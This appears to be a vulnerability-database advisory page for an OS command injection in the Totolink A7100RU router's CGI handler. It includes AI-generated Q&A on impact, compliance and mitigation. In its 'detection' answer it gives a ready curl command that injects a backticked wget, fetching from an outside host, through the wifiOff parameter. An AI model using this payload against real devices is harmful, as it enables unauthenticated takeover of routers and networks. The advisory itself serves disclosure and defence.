CVE-2026-5993
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-10
Last updated on: 2026-04-10
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The CVE-2026-5993 vulnerability allows remote attackers to execute arbitrary OS commands on the affected TOTOLINK A7100RU router via command injection in the wifiOff parameter. This can lead to unauthorized access, data manipulation, or disruption of network services.
Such unauthorized access and control over network devices can compromise the confidentiality, integrity, and availability of data processed or transmitted by the device. Consequently, this vulnerability may impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.
Specifically, exploitation of this vulnerability could lead to data breaches or service interruptions, both of which are critical concerns under these regulations. Organizations using the affected device must consider this risk in their compliance assessments and remediation plans.
Can you explain this vulnerability to me?
CVE-2026-5993 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI Handler component, specifically in the function setWiFiGuestCfg within the /cgi-bin/cstecgi.cgi file.
The vulnerability arises because the user-supplied parameter "wifiOff" is improperly handled. Its value is inserted into a buffer and then passed to a system command execution function without proper sanitization, allowing an attacker to inject arbitrary operating system commands.
An attacker can exploit this remotely by sending a crafted HTTP POST request to the router with the "wifiOff" parameter containing malicious commands, which the router then executes.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without authentication.
Exploitation can lead to full compromise of the router, including unauthorized control over network traffic, interception or modification of data, and potential use of the device as a foothold for further attacks within the network.
Because the exploit is publicly available, the risk of attack is high, and attackers can easily leverage this vulnerability to disrupt network operations or steal sensitive information.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending a crafted HTTP POST request to the endpoint /cgi-bin/cstecgi.cgi with the parameter "wifiOff" containing arbitrary OS commands. If the router executes the embedded command, it confirms the presence of the command injection vulnerability.
For example, you can test detection by sending a POST request with JSON data: {"topicurl":"setWiFiGuestCfg","wifiOff":"`wget 192.168.6.1:7777/testpoc`"}.
This can be done using curl from a command line as follows:
- curl -X POST http://<router-ip>/cgi-bin/cstecgi.cgi -H "Content-Type: application/json" -d '{"topicurl":"setWiFiGuestCfg","wifiOff":"`wget 192.168.6.1:7777/testpoc`"}'
If the router executes the wget command (or any other injected command), it indicates the vulnerability is present.
What immediate steps should I take to mitigate this vulnerability?
To mitigate the CVE-2026-5993 vulnerability in the Totolink A7100RU router, immediate steps include restricting remote access to the device's management interface to prevent exploitation via crafted HTTP POST requests.
Additionally, monitoring network traffic for suspicious POST requests targeting /cgi-bin/cstecgi.cgi with unusual parameters like "wifiOff" can help detect exploitation attempts.
If possible, temporarily disabling the vulnerable function or the affected CGI handler until a patch or firmware update is available is recommended.
Finally, applying any available firmware updates from the vendor that address this vulnerability should be prioritized once released.